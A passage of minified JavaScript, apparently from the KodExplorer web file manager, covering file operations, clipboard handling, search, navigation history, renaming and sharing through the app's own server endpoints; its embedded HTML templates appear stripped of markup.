o=n(t);o+="&getMd5=1",core.fileInfo(o,function(e){i.removeClass("file-md5-loading"),e.code?i.html(e.data.fileMd5):i.html(LNG.error)})}var s=a.find("input.download-url"),r=s.get(0);s.unbind("hover click").bind("hover click",function(){$(this).focus();var e=s.val().length;if($.browser.msie){var t=r.createTextRange();t.moveEnd("character",-r.value.length),t.moveEnd("character",e),t.moveStart("character",0),t.select()}else r.setSelectionRange(0,e)}),a.find(".edit-chmod").click(function(){var e=$(this).parent().find("input"),a=$(this);$.ajax({url:G.appHost+"explorer/pathChmod&mod="+e.val(),type:"POST",data:n(t),beforeSend:function(){a.text(LNG.loading)},error:function(){a.text(LNG.button_save)},success:function(e){a.text(e.data).animate({opacity:.6},400,0).delay(1e3).animate({opacity:1},200,0,function(){a.text(LNG.button_save)}),e.code&&ui.f5()}})})},w=function(e,t,a){var i=function(){$.ajax({url:G.appHost+"fav/del&name="+urlEncode(e),dataType:"json",async:!1,success:function(e){"function"==typeof t&&t(e)}})};return a?(i(),void 0):($.dialog({id:"dialog-fav-remove",fixed:!0,icon:"question",title:LNG.fav_remove,width:200,padding:"40px 20px",content:LNG.fav_remove+"?",ok:i,cancel:!0}),void 0)},_=function(e){if(e){if(-1==trim(core.pathClear(e.path),"/").indexOf("/")){var t=core.getPathIcon(e.path,e.name);""!=t.icon&&(e.ext=t.icon,e.name=t.name)}"/"==e.path&&(e.name="Home"),$.ajax({url:G.appHost+"fav/add",dataType:"json",data:e,success:function(e){Tips.tips(e),e.code&&!core.isApp("desktop")&&ui.tree.refreshFav()}})}},L=function(e){var t={};return t.type=e.find("input[type=radio]:checked").val(),t.content=e.find("textarea").val(),t.group=e.find("[name=group]").val(),e.find("input[type=text]").each(function(){var e=$(this).attr("name");t[e]=$(this).val()}),e.find("input[type=checkbox]").each(function(){var e=$(this).attr("name");t[e]="checked"==$(this).attr("checked")?1:0}),t},N=function(e){e.find(".type input").change(function(){var t=$(this).attr("apptype");e.find("[data-type]").addClass("hidden"),e.find("[data-type="+t+"]").removeClass("hidden")}),e.find(".app-edit-select-icon").unbind("click").bind("click",function(){var t=G.basicPath+"static/images/file_icon/icon_app/";G.isRoot||(t=""),core.api.pathSelect({type:"file",title:LNG.path_api_select_file,firstPath:t},function(t){var t=core.path2url(t);e.find(".app-edit-select-icon-input").val(t)})}),e.find(".size-full").unbind("click").bind("click",function(){var t=$(this).prop("checked");t?(e.find("[name=width]").val("100%"),e.find("[name=height]").val("100%")):(e.find("[name=width]").val("800"),e.find("[name=height]").val("600"))})},C=function(t,a,i){var n,o,s,r=LNG.app_create,l=UUID(),c=e("./tpl/appEdit.html"),d=template.compile(c);switch(void 0==i&&(i="userEdit"),"rootEdit"==i&&(t=t),"userEdit"==i||"rootEdit"==i?(r=LNG.app_edit,s=d({LNG:LNG,uuid:l,data:t,appType:G.settings.appType})):s=d({LNG:LNG,uuid:l,data:{},appType:G.settings.appType}),$.dialog({fixed:!0,width:450,id:l,padding:15,title:r,content:s,button:[{name:LNG.preview,callback:function(){return core.openApp(L(n)),!1}},{name:LNG.button_save,focus:!0,callback:function(){var e=L(n);switch(i){case"userAdd":var s=urlEncode(G.thisPath+e.name);o=G.appHost+"app/userApp&action=add&path="+s;break;case"userEdit":o=G.appHost+"app/userApp&path="+urlEncode(t.path);break;case"rootAdd":o=G.appHost+"app/add&name="+urlEncode(e.name);break;case"rootEdit":o=G.appHost+"app/edit&name="+urlEncode(e.name)+"&old_name="+urlEncode(t.name);break;default:}$.ajax({url:o,type:"POST",dataType:"json",data:{data:urlEncode(jsonEncode(e))},beforeSend:function(){Tips.loading()},error:core.ajaxError,success:function(e){if(Tips.close(e),e.code)if("rootEdit"==i||"rootAdd"==i){if(!e.code)return;ShareData.frameTop("Openapp_store",function(e){e.App.reload()})}else"function"==typeof a?a():ui.f5()}})}}]}),n=$("."+l),G.isRoot||$(".appbox .appline .right a.open").remove(),t.group&&n.find("option").eq(t.group).attr("selected",1),n.find(".aui-content").css("overflow","inherit"),i){case"userEdit":n.find(".name").addClass("hidden"),n.find(".desc").addClass("hidden"),n.find(".group").addClass("hidden"),n.find("option[value="+t.group+"]").attr("checked",!0),"url"!=t.type&&n.find(".appline[data-type=url]").addClass("hidden");break;case"userAdd":n.find(".desc").addClass("hidden"),n.find(".group").addClass("hidden"),n.find("[apptype=url]").attr("checked",!0),n.find("[data-type=url] input[name=resize]").attr("checked",!0),n.find("input[name=width]").attr("value","800"),n.find("input[name=height]").attr("value","600"),n.find("input[name=icon]").attr("value","oexe.png");break;case"rootAdd":n.find("[apptype=url]").attr("checked",!0),n.find("[data-type=url] input[name=resize]").attr("checked",!0),n.find("input[name=width]").attr("value","800"),n.find("input[name=height]").attr("value","600"),n.find("input[name=icon]").attr("value","oexe.png");break;case"rootEdit":n.find("option[value="+t.group+"]").attr("selected",!0),"url"!=t.type&&n.find(".appline[data-type=url]").addClass("hidden");break;default:}N(n)},T=function(){core.appStore()},S=function(e){e&&4>e.length&&"http"!=e.substring(0,4)||$.ajax({url:G.appHost+"app/getUrlTitle&url="+e,dataType:"json",beforeSend:function(){Tips.loading()},success:function(t){var a=t.data;a=a.replace(/[\/\\]/g,"_"),Tips.close(t);var i={content:e,type:"url",desc:"",group:"others",icon:"internet.png",name:a,resize:1,simple:0,height:"70%",width:"90%"},n=urlEncode(G.thisPath+a);e=G.appHost+"app/userApp&action=add&path="+n,$.ajax({url:e,type:"POST",dataType:"json",data:{data:urlEncode(jsonEncode(i))},success:function(e){Tips.close(e),e.code&&ui.f5()}})}})};return{makeJson:n,appEdit:C,appList:T,appAddURL:S,share:u,shareBox:f,setBackground:v,createLink:g,createProject:b,imageRotate:y,newFile:o,newFolder:s,rname:r,zipDownload:c,zip:d,unZip:p,info:k,remove:l,fav:_,favRemove:w}}),define("app/path/tpl/fileinfo/fileInfo.html",[],"
      \n {{if downloadPath}}\n
      \n
      {{LNG.download_address}}:
      \n
      \n \n
      \n \n \n
      \n
      \n
      \n
      \n
      \n {{/if}}\n\n
      \n
      {{LNG.address}}:
      \n
      {{path |kod.window.htmlEncode}}
      \n
      \n
      \n
      \n
      {{LNG.size}}:
      \n
      {{sizeFriendly}} ({{size}} Byte)
      \n
      \n
      \n\n {{if fileMd5}}\n
      \n
      MD5:
      \n
      {{fileMd5}}
      \n
      \n
      \n {{/if}}\n\n {{if imageSize}}\n
      \n
      {{LNG.image_size}}:
      \n
      {{imageSize.width}} × {{imageSize.height}}
      \n
      \n
      \n {{/if}}\n\n
      \n\n {{if ctime}}\n
      \n
      {{LNG.create_time}}
      \n
      {{ctime}}
      \n
      \n
      \n {{/if}}\n\n {{if mtime}}\n
      \n
      {{LNG.modify_time}}
      \n
      {{mtime}}
      \n
      \n
      \n {{/if}}\n\n {{if atime}}\n
      \n
      {{LNG.last_time}}
      \n
      {{atime}}
      \n
      \n
      \n {{/if}}\n\n {{if owner}}\n
      \n
      {{LNG.file_info_owner}}
      \n
      {{owner}}
      \n
      \n
      \n {{/if}}\n\n {{if group}}\n
      \n
      {{LNG.file_info_group}}
      \n
      {{group}}
      \n
      \n
      \n {{/if}}\n \n {{if mode}}\n
      \n
      \n
      {{LNG.permission}}:
      \n
      {{mode}}
      \n
      \n
      \n {{if is_root==\"1\"}}\n
      \n
      {{LNG.permission_edit}}:
      \n
      \n
      \n
      \n
      \n {{/if}}\n {{/if}}\n
      \n"),define("app/path/tpl/fileinfo/pathInfo.html",[],"
      \n
      \n
      {{LNG.address}}:
      \n
      {{path |kod.window.htmlEncode}}
      \n
      \n
      \n
      \n
      {{LNG.size}}:
      \n
      {{sizeFriendly}} ({{size}} Byte)
      \n
      \n
      \n
      \n
      {{LNG.contain}}:
      \n
      {{fileCount}} {{LNG.file}},{{folderCount}} {{LNG.folder}}
      \n
      \n
      \n \n
      \n {{if ctime}}\n
      \n
      {{LNG.create_time}}
      \n
      {{ctime}}
      \n
      \n
      \n {{/if}}\n\n {{if mtime}}\n
      \n
      {{LNG.modify_time}}
      \n
      {{mtime}}
      \n
      \n
      \n {{/if}}\n\n {{if atime}}\n
      \n
      {{LNG.last_time}}
      \n
      {{atime}}
      \n
      \n
      \n {{/if}}\n\n {{if owner}}\n
      \n
      {{LNG.file_info_owner}}
      \n
      {{owner}}
      \n
      \n
      \n {{/if}}\n\n {{if group}}\n
      \n
      {{LNG.file_info_group}}
      \n
      {{group}}
      \n
      \n
      \n {{/if}}\n\n {{if mode}}\n
      \n
      \n
      {{LNG.permission}}:
      \n
      {{mode}}
      \n
      \n
      \n {{if is_root==\"1\"}}\n
      \n
      {{LNG.permission_edit}}:
      \n
      \n
      \n
      \n
      \n {{/if}}\n {{/if}}\n
      \n"),define("app/path/tpl/share.html",[],'
      \n
      \n
      {{LNG.share_title}}
      \n \n
      \n
      \n
      \n {{LNG.share_path}}:\n \n
      \n
      \n
      \n {{LNG.share_name}}:\n \n \n \n \n \n
      \n
      \n\n \n\n \n
      \n \n
      '),define("app/path/tpl/fileinfo/pathInfoMore.html",[],"
      \n
      \n
      {{LNG.info}}:
      \n
      \n {{fileCount}} {{LNG.file}},{{folderCount}} {{LNG.folder}}
      \n
      \n
      \n
      \n
      \n
      {{LNG.size}}:
      \n
      {{sizeFriendly}} ({{size}} Byte)
      \n
      \n
      \n \n
      \n
      \n
      {{LNG.permission}}:
      \n
      {{mode}}
      \n
      \n
      \n {{if is_root==\"1\"}}\n
      \n
      {{LNG.permission_edit}}:
      \n
      \n
      \n
      \n
      \n {{/if}}\n
      \n"),define("app/path/tpl/appEdit.html",[],"
      \n
      \n
      {{LNG.name}}
      \n
      \n
      \n
      \n
      \n
      {{LNG.app_desc}}
      \n
      \n
      \n
      \n
      \n
      {{LNG.app_icon}}
      \n
      \n \n
      \n
      \n
      \n
      \n
      {{LNG.app_group}}
      \n
      \n \n
      \n
      \n
      \n
      \n
      {{LNG.app_type}}
      \n
      \n \n \n \n \n \n \n
      \n
      \n
      \n\n
      \n
      {{LNG.app_display}}
      \n
      \n \n \n \n \n
      \n
      \n
      \n
      \n
      {{LNG.app_size}}
      \n
      \n ({{LNG.width}})  \n ({{LNG.height}})\n\n \n \n
      \n
      \n
      \n
      \n \n \n
      {{LNG.app_url}}
      \n
      \n
      \n
      \n
      \n"),define("app/path/clipboard",[],function(){var e=function(e){return ui.path.pathOperate.makeJson(e) },t=function(t){1>t.length||$.ajax({url:G.appHost+"explorer/pathCopy",type:"POST",dataType:"json",data:e(t),error:core.ajaxError,success:function(e){Tips.tips(e)}})},a=function(t){1>t.length||$.ajax({url:G.appHost+"explorer/pathCute",type:"POST",dataType:"json",data:e(t),error:core.ajaxError,success:function(e){Tips.tips(e)}})},i=function(e,t){e&&(Tips.loading(LNG.moving),setTimeout(function(){var a=G.appHost+"explorer/pathPast&path="+urlEncode(e);$.ajax({url:a,dataType:"json",error:core.ajaxError,success:function(e){Tips.close(e.data,e.code),"function"==typeof t&&t(e.info)}})},50))},n=function(t,a,i){a&&$.ajax({url:G.appHost+"explorer/pathCuteDrag",type:"POST",dataType:"json",data:e(t)+"&path="+urlEncode(a+"/"),beforeSend:function(){Tips.loading(LNG.moving)},error:core.ajaxError,success:function(e){Tips.close(e),e.code&&core.playSound("drag_drop"),"function"==typeof i&&i(e.info)}})},o=function(t,a,i,n){a&&(void 0==n&&(n=0),$.ajax({url:G.appHost+"explorer/pathCopyDrag",type:"POST",dataType:"json",data:e(t)+"&path="+urlEncode(a+"/")+"&filename_auto="+Number(n),beforeSend:function(){Tips.loading(LNG.moving)},error:core.ajaxError,success:function(e){Tips.close(e),e.code&&core.playSound("drag_drop"),"function"==typeof i&&i(e.info)}}))},s=function(e,t){var a="style='height:150px;border-left: 3px solid #def;overflow:auto;margin:20px;background: #f0f8ff;padding:20px;width:300px'",i="
      "+LNG.clipboard_null+"
      ";if(0!=e.length){i="
      "+LNG.clipboard_state+LNG[t]+"
      ";for(var n=40,o=0;e.length>o;o++){var s=e[o],r=s.path;r=n>r.length?r:"..."+r.substr(-n),i+="
      "+s.type+": "+r+""}i+='
      "}return i},r=function(){$.ajax({url:G.appHost+"explorer/clipboard",dataType:"json",error:core.ajaxError,success:function(e){e.code&&($.dialog({id:"dialog-clipboard",title:LNG.clipboard,width:400,content:s(e.data,e.info)}),$(".clipboard-clear").one("click",function(){Tips.tips(LNG.success),$.get(G.appHost+"explorer/clipboard&clear=ok"),$.dialog.list["dialog-clipboard"].close()}))}})},l=function(){var e=function(){var e=G.appHost+"explorer/fileUpload";return"share"==G.sharePage&&"1"==G.shareInfo.canUpload&&(e=G.appHost+"share/fileUpload&user="+G.user+"&sid="+G.sid),e},t=function(e){if(e.clipboardData&&e.clipboardData.items){var t=Array.prototype.filter.call(e.clipboardData.items,function(e){return e.type.indexOf("image")>=0});Array.prototype.forEach.call(t,function(e){var t=new FileReader;t.onloadend=function(){a(this.result)},t.readAsDataURL(e.getAsFile())})}},a=function(t){if(!core.uploadCheck("explorer.serverDownload"))return!1;t=t.replace("data:image/png;base64,","");var a=date("20yymd-his")+".png";$.ajax({type:"POST",dataType:"json",url:e()+"&base64Upload=1&upload_to="+urlEncode(G.thisPath)+"&name="+a,data:{file:t},beforeSend:function(){Tips.loading(LNG.loading)},error:core.ajaxError,success:function(e){Tips.close(e)}})};$(window).on("paste",t)};return l(),{copy:t,cute:a,past:i,cuteDrag:n,copyDrag:o,clipboard:r}}),define("app/path/search",[],function(e){var t=e("./tpl/search.html"),a=e("./tpl/searchList.html");return function(e,i){i||(i=G.thisPath);var n,o,s=function(){var a=trim(core.pathClear(i),"/");if(0==a.indexOf(G.KOD_USER_SHARE)&&-1==a.indexOf("/")||a==G.KOD_USER_FAV||a==G.KOD_GROUP_ROOT_ALL)return Tips.tips(LNG.path_cannot_search,!1),void 0;template.helper("searchResultPrase",c);var s=template.compile(t);0==$(".dialog-do-search").length?(n=$.dialog({id:"dialog-do-search",padding:0,fixed:!0,ico:core.icon("search"),resize:!0,title:LNG.search,width:460,height:480,content:s({LNG:LNG})}),o=p(),o.path=i,""!=e&&(o.search=e),$("#search-path").val(o.path),$("#search-value").val(o.search),d()):($.dialog.list["dialog-do-search"].display(!0),e&&$("#search-value").val(e),$("#search-path").val(i),l())},r=function(){return o={search:$("#search-value").val(),path:$("#search-path").val(),is_content:Number($("#search-is-content").is(":checked")),is_case:Number($("#search-is-case").is(":checked")),ext:$("#search-ext").val()}},l=function(){r(),f(o)},c=function(e){var t=htmlEncode($("#search-value").val());if(e=htmlEncode(e),o.is_case)e=e.replace(t,''+t+"");else{var a=e.toLowerCase().indexOf(t.toLowerCase());e=e.substr(0,a)+''+e.substr(a,t.length)+""+e.substr(a+t.length)}return e},d=function(){$("#search-value").die("keyup").live("keyup",function(){core.isApp("editor")||ui.path.setSearchByStr($(this).val())}),$("#search-value,#search-ext,#search-path").keyEnter(l),$(".search-header .btn").die("click").live("click",l),$(".search-result .file-item .file-info").die("click").live("click",function(e){var t=$(this).parent();return t.toggleClass("open"),t.find(".result-item").slideToggle(200),stopPP(e),!1}),$(".search-result .file-item .file-info .goto").die("click").live("click",function(e){var t=$(this).parent().parent(),a=pathHashDecode(t.attr("data-path")),i=core.pathFather(a);return core.openPath(i),setTimeout(function(){core.isApp("explorer")&&ui.path.setSelectByFilename(a)},200),stopPP(e),!1}),$(".search-result .file-item .file-info .title").die("click").live("click",function(e){var t=$(this).parent().parent(),a=pathHashDecode(t.attr("data-path"));return kodApp.setLastOpenTarget(t),kodApp.open(a,t.attr("data-ext")),stopPP(e),!1}),$(".search-result .file-item .result-info").die("click").live("click",function(e){var t=$(this).parent().parent(),a=pathHashDecode(t.attr("data-path"));$(".search-result .file-item .result-info.this").removeClass("this"),$(this).addClass("this");var i=parseInt($(this).find(".line").attr("data-line"));return ShareData.data("FILE_SEARCH_AT",{search:$("#search-value").val(),line:i,lineIndex:$(this).parent().find("[data-line="+i+"]").index($(this).find(".line"))}),kodApp.open(a,t.attr("data-ext"),"aceEditor"),stopPP(e),!1}),$(".search-header input[type=checkbox]").on("click",function(){r(),p(o)})},p=function(e){var t="box_search_config";if(void 0==e){var e=LocalData.getConfig(t);return e||(e={search:"",is_content:0,is_case:0,ext:""}),$("#search-value").val(e.search).textSelect(),e.is_content?$("#search-is-content").attr("checked","checked"):$("#search-is-content").removeAttr("checked"),e.is_case?$("#search-is-case").attr("checked","checked"):$("#search-is-case").removeAttr("checked"),$("#search-ext").val(e.ext),e}return LocalData.setConfig(t,e)},u=function(e){var t=$(".file-items"),i=$(".search-desc");if(!e.code)return i.html(e.data),t.html(""),void 0;if(0==e.data.fileList.length&&0==e.data.folderList.length)return i.html(LNG.search_null),t.html(""),void 0;var n=template.compile(a);if(t.html(n({code:e.code,data:e.data,LNG:LNG})),o.is_content){for(var s=e.data.fileList,r=0,l=0;s.length>l;l++)s[l].searchInfo&&(r+=s[l].searchInfo.length);i.html(LNG.search_result+": "+r+"(in "+s.length+" files)"),e.data.error_info&&i.html(""+LNG.seach_result_too_more+"")}else i.html(e.data.fileList.length+" "+LNG.file+", "+e.data.folderList.length+LNG.folder+".")},f=function(e){p(e),$("#search-value").textFocus();var t=$(".file-items"),a=$(".search-desc");if(!e.search||!e.path)return a.html(LNG.search_info),t.html(""),void 0;var i=G.appHost+"explorer/search";G.sharePage!==void 0&&(i=G.appHost+"share/search&user="+G.user+"&sid="+G.sid),$.ajax({url:i,dataType:"json",type:"POST",data:e,beforeSend:function(){a.hide().html(LNG.searching+'').fadeIn(100)},error:function(){core.ajaxError(),a.html(LNG.error)},success:function(e){u(e)}})};s()}}),define("app/path/tpl/search.html",[],"\n\n"),define("app/path/tpl/searchList.html",[],'\n{{each data.folderList v i}}\n
    • \n
      \n \n {{\'folder\' |core.icon}}\n {{v.name | searchResultPrase}}\n \n
      \n
    • \n{{/each}}\n\n\n{{each data.fileList v i}}\n {{if v.searchInfo}}\n
    • \n
      \n \n {{v.ext |core.icon}}\n \n {{v.name | kod.window.htmlEncode}}\n \n {{v.searchInfo.length}}\n \n
      \n
        \n {{each v.searchInfo value index}}\n
      • \n {{value.line}}:\n {{@value.str | searchResultPrase}}\n
      • \n {{/each}}\n
      \n
    • \n {{else}}\n
    • \n
      \n \n {{v.ext |core.icon}}\n {{v.name | searchResultPrase}}\n \n
      \n
    • \n {{/if}}\n{{/each}}\n\n'),define("app/path/path",["./pathOperate","./clipboard","./search"],function(e){var t=e("./pathOperate"),a=e("./clipboard"),i=e("./search"),n=void 0,o=function(){if(G.jsonData.info.pathType==G.KOD_USER_RECYCLE||G.jsonData.info.pathType==G.KOD_USER_SHARE)return!0;if(ui.fileLight){var e=ui.fileLight.fileListSelect();if(e.hasClass("systemBox"))return Tips.tips(LNG.path_can_not_action,"warning"),!1}return!0},s=function(e,t,a,i){if(e){if(!core.isApp("explorer"))return core.explorer(e),void 0;if(e==G.thisPath)return void 0!=t&&""!=t&&Tips.tips(LNG.path_is_current,"info"),void 0;G.thisPath=e.replace(/\\/g,"/"),G.thisPath=e.replace(/\/+/g,"/"),"/"!=G.thisPath.substr(G.thisPath.length-1)&&(G.thisPath+="/");var n=$(".dialog-file-upload");if(n.length>0){var o="none"==n.css("display")||"hidden"==n.css("visibility");o||core.upload()}if(G.sid!==void 0&&(window.location.href="#"+urlEncode(G.thisPath)),core.playSound("folder_open"),i||ui.path.history.add(G.thisPath),"split"==G.userConfig.listType){var s=$(".split-box .file[data-path="+pathHashEncode(G.thisPath)+"]");if(0!=s.length&&0!=s.find(".children-more-cert").length)return s.click(),void 0;$(".file-list-split .split-box").remove()}ui.f5Callback(function(){"function"==typeof a&&a()})}},r=function(){var e=[],t=60,a=0,i=function(i){var n=e.length-1;return n==a&&e[n]==i?r():(a!=n&&(e=e.slice(0,a+1)),e[e.length-1]!=i&&e.push(i),e.length>=t&&(e=e.slice(1)),a=e.length-1,r(),void 0)},n=function(){e.length-1>=a+1&&(s(e[++a],"","",!0),r())},o=function(){a-1>=0&&(s(e[--a],"","",!0),r())},r=function(){var t="disable",i=e.length-1;$("#btn-history-next").addClass(t),$("#btn-history-back").addClass(t),(0!=a||0!=i)&&(a>0&&i>=a&&$("#btn-history-back").removeClass(t),a>=0&&a!=i&&$("#btn-history-next").removeClass(t))};return{add:i,back:o,next:n,list:function(){return e}}}(),l=function(e){if(void 0!=e){"string"==typeof e&&(e=[e]);for(var t=0;e.length>t;t++)e[t]=trim(e[t],"/");ui.fileLight.clear(),ui.fileLight.fileListAll().each(function(){var t=trim(ui.fileLight.path($(this)),"/");t&&-1!=$.inArray(t,e)&&$(this).addClass(Config.SelectClassName)}),ui.fileLight.select(),ui.fileLight.setInView()}},c=function(e){if(""!=e){if(e=e.toLowerCase(),void 0==n||G.thisPath!=n.path||e!=n.key){var t=[];ui.fileLight.fileListAll().each(function(){var a=ui.fileLight.name($(this)),i=ui.fileLight.path($(this));a&&e==a.substring(0,e.length).toLowerCase()&&t.push(i)}),n={key:e,path:G.thisPath,index:0,list:t}}0!=n.list.length&&(Tips.pop(n.key),l(n.list[n.index++]),n.index==n.list.length&&(n.index=0))}},d=function(e){return""==e?(ui.fileLight.clear(),void 0):(ui.fileLight.clear(),ui.fileLight.fileListAll().each(function(t){var a=ui.fileLight.name($(this));-1!=a.toLowerCase().indexOf(e)&&$(ui.fileLight.fileListAll()).eq(t).addClass(Config.SelectClassName)}),ui.fileLight.select(),ui.fileLight.setInView(),void 0)},p=function(e,t){var a=G.thisPath+e;return void 0==t&&(a+="/"),0!=$('.bodymain .file[data-path="'+pathHashEncode(a)+'"]').length?!0:!1},u=function(e,t){var a,i=0,n="."+t;if((void 0==t||""==t)&&(n=""),!p(e+n,t))return e+n;for(a=e+"(0)"+n;p(a,t);)i++,a=e+"("+i+")"+n;return a},f=function(e,t){var a,i=0,n=G.jsonData.folderList,o=G.jsonData.fileList,s=n,r=G.userConfig.listSortField,l=G.userConfig.listSortOrder,c={name:e,size:0,ext:t,mtime:date("Y/m/d H:i:s",time())};for(core.isApp("desktop")&&(i+=$(".menu-default").length+1),"file"==t?(c.ext=core.pathExt(e),s=o,"up"==l&&(i+=n.length)):"down"==l&&(i+=o.length),a=0;s.length>a;a++)if("down"==l){if(-1==pathTools.strSort(s[a][r],c[r]))break}else if(-1!=pathTools.strSort(s[a][r],c[r]))break;return a+i-1},h=function(a,i,n){ui.fileLight.clear();var o=f(i,a),s=$(Config.FileBoxSelector);"split"==G.userConfig.listType&&(s=$(".split-box.split-select").find(".content"));var r=e("./tpl/file/create.html"),l=template.compile(r),c=l({type:a,newname:i,ext:n,listType:G.userConfig.listType});if(-1==o||0==s.find(".file").length)s.html(c+s.html());else{var d=s.find(".file:eq("+o+")");0==d.length&&(d=s.find(".file").last()),"split"==G.userConfig.listType&&(d=$(".split-box.split-select .file").last()),$(c).insertAfter(d)}var u=$(".textarea .newfile"),h=i.length;"folder"!=a&&-1!=i.indexOf(".")&&(h=i.length-n.length-1),u.textSelect(0,h),"split"==G.userConfig.listType&&u.css("width",u.parents(".filename").width()-40),"icon"==G.userConfig.listType?($("#makefile").css({height:$("#makefile").width()+15,transition:"none"}),$("#makefile .textarea").css("margin-top","-13px")):$("#makefile .x-item-file").addClass("small"),core.isApp("desktop")&&ui.resetDesktopIcon();var m=function(e){e===!1?$("#makefile").remove():v(e)},g=function(e){if(""==trim(e))return $("#makefile").remove(),Tips.tips(LNG.error,"warning"),void 0;if(p(e,n))$("#makefile").remove(),Tips.tips(LNG.path_exists,"warning");else{var i=G.thisPath;"split"==G.userConfig.listType&&(i=ui.fileLight.path($(".file-icon-edit").parents(".split-box"))),"folder"==a?t.newFolder(i+e,m):t.newFile(i+e,m)}};ui.fileLight.setInView($(".file-continer .file-icon-edit")),u.focus().autoTextarea(),u.unbind("keydown").keydown(function(e){13==e.keyCode&&(stopPP(e),e.preventDefault(),g(u.attr("value"))),27==e.keyCode&&$("#makefile").remove()}).unbind("blur").blur(function(){g(u.attr("value"))})},m=function(){var e="",a=ui.fileLight.fileListSelect(),i=ui.fileLight.name(a),n=core.pathFather(ui.fileLight.path(a)),s=ui.fileLight.type(a);if(1==a.length&&o()){if(a.hasClass("menuSharePath"))return ui.path.shareEdit(),void 0;var r=htmlEncode(rtrim(i,".oexe")),l="";"icon"==G.userConfig.listType&&(l="",a.css({height:a.height()})),$(a).addClass("file-icon-edit").find(".title").html("
      "+l+"
      ");var c=$("#pathRenameTextarea");"split"==G.userConfig.listType&&c.css({width:c.parents(".filename").width()-32,height:c.parents(".filename").height()+1});var d=i.length;"folder"!=s&&-1!=i.indexOf(".")&&(d=i.length-s.length-1),s||0!=i.indexOf(".")?c.textSelect(0,d):c.textSelect(0,i.length);var p=function(o){if("oexe"==s&&(o+=".oexe"),o!=i)e=n+i,o=n+o,t.rname(e,o,function(e){e===!1?$(a).removeClass("file-icon-edit").find(".title").html(htmlEncode(i)):v(e)});else{var r=i;".oexe"==r.substr(-5)&&(r=r.substr(0,r.length-5)),$(a).removeClass("file-icon-edit").find(".title").html(htmlEncode(r))}};c.focus().autoTextarea(),c.keydown(function(e){13==e.keyCode&&(e.preventDefault(),stopPP(e),p(c.attr("value"))),27==e.keyCode&&("oexe"==s&&(i=i.replace(".oexe","")),$(a).removeClass("file-icon-edit").find(".title").html(i))}).unbind("blur").blur(function(){p(c.val())})}},v=function(e){ui.fileLight.clear(),ui.f5Callback(function(){l(e),core.isApp("explorer")&&ui.tree.checkIfChange(G.thisPath)})},g=function(e){var t={},a=[];e.sort(function(e,t){return e.path==t.path?0:e.path>t.path?1:-1});for(var i=function(e){for(var a=e;""!=e;){if(t[e]!==void 0)return 1==t[e]?!0:a==e?(t[e]=1,!1):!0;e=core.pathFather(e)}return!1},n=0;e.length>n;n++)if("folder"==e[n].type){var o=rtrim(e[n].path,"/")+"/";t[o]||i(o)||(t[o]=0)}for(var n=0;e.length>n;n++){var o=e[n].path;"folder"==e[n].type&&(o=rtrim(o,"/")+"/"),i(o)||a.push(e[n])}return a},b=function(e,t,a){var i=ui.fileLight.fileListSelect();if(e){var n=[];return 0==i.length?n:(i.each(function(){var e=ui.fileLight.path($(this)),t="folder"==ui.fileLight.type($(this))?"folder":"file";n.push({path:e,type:t})}),g(n))}if(1!=i.length)return{path:"",type:""};var t=ui.fileLight.path(i),a=ui.fileLight.type(i);return{path:t,type:a}},y=function(e,t){for(var a in G.jsonData)if("fileList"==a||"folderList"==a)for(var i=0;G.jsonData[a].length>i;i++)if(G.jsonData[a][i][e]==t)return G.jsonData[a][i]};return{search:i,makeParam:b,refreshCallback:v,history:r,getJsondataCell:y,checkSystemPath:o,pathOperate:t,appList:function(){t.appList(b().path)},appInstall:function(){t.appInstall(b().path)},openWindow:function(){var e=b();return"folder"==e.type&&-1!=core.path2url(e.path).search("explorer/fileProxy")?(Tips.tips(LNG.path_can_not_action,!1),void 0):(kodApp.openWindow(e.path),void 0)},open:function(e){var t=ui.fileLight.fileListSelect();if(void 0!=e||core.isApp("editor"))return kodApp.setLastOpenTarget($(".curSelectedNode").parent()),kodApp.open(e),void 0;if(0!=t.length){var a=b();if(0!=$(t).find(".file-not-exists").length)return Tips.tips(LNG.share_error_path,!1),void 0;if("split"!=G.userConfig.listType||"folder"!=a.type){if("oexe"==a.type){var i=t.attr("data-app");if(i){var n=jsonDecode(base64Decode(i));return core.openApp(n),void 0}}kodApp.setLastOpenTarget(t),kodApp.open(a.path,a.type)}}},share:function(){t.share(b())},setBackground:function(){var e=core.path2url(b().path);ShareData.frameTop("",function(t){t.ui.setWall(e)}),ui.setWall(e),t.setBackground(e)},createLink:function(e){var a=b(),i=ui.fileLight.fileListSelect().last();a.name=trim(i.find(".filename").text()),t.createLink(a.path,a.name,a.type,e,v)},createProject:function(){t.createProject(b().path,v)},download:function(){var e=b(!0),a=!1;$.each(e,function(){"folder"==this.type&&(a=!0)}),a||$.isIE()?t.zipDownload(e):$.each(e,function(){kodApp.download(this.path)})},shareEdit:function(){var e=y("path",b().path);try{var a=G.jsonData.shareList[e.sid];t.shareBox(a)}catch(i){}},shareOpenWindow:function(){var e=y("path",b().path),t="file";"folder"==e.type&&(t=1==e.codeRead?"codeRead":"folder");var a=G.appHost+"share/"+t+"&user="+G.jsonData.info.id+"&sid="+e.sid;window.open(a)},shareOpenPath:function(){var e=b(),t=y("path",e.path);if(!t||!G.jsonData.shareList)return kodApp.open(e.path,e.type),void 0;var a=G.jsonData.shareList[t.sid],i=core.pathFather(a.path),n=core.pathThis(a.path);"folder"==a.type?ui.path.list(a.path,""):ui.path.list(i,"",function(){l(n)})},explorer:function(){core.explorer(b().path)},explorerNew:function(){window.open(G.appHost+"explorer&path="+b().path)},openProject:function(){core.explorerCode(b().path)},search:function(){i("",b().path)},fav:function(){var e=b(),a=ui.fileLight.fileListSelect().last();e.name=trim(a.find(".filename").text()),t.fav(e)},recycleClear:function(){t.remove([{type:"recycle-clear",path:""}],function(){ui.f5()})},remove:function(e,a,i){if(G.jsonData.info&&o()){var n=b(!0);G.jsonData.info&&G.jsonData.info.pathType==G.KOD_USER_SHARE&&G.jsonData.info.id==G.userID&&-1==trim(G.thisPath,"/").indexOf("/")&&$.each(n,function(e){var t=y("path",n[e].path);void 0!=t&&(n[e].type="share",n[e].path=t.sid)}),i?t.remove(n,i,e,a):t.remove(n,v,e,a)}},favRemove:function(){var e=$(".file.select .filename");e.each(function(a){var 